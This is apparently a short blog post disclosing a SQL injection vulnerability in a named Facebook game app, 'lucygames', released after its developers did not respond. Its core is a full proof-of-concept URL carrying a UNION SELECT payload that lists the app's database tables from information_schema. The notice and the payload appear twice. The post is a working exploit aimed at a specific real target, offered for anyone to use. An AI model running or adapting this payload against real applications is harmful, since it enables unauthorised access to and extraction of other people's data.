This is second sql injection we found in facebook apps.
We tried to contact developers but got no response from them. So we decided to release the vulnerability.
Note:: There are few more facebook apps which we found are vulnerable to sql injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.
A Proof Of Concept of the vulnerability can be seen at::
http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
We tried to contact developers but got no response from them. So we decided to release the vulnerability.
Note:: There are few more facebook apps which we found are vulnerable to sql injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.
A Proof Of Concept of the vulnerability can be seen at::
http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
No comments:
Post a Comment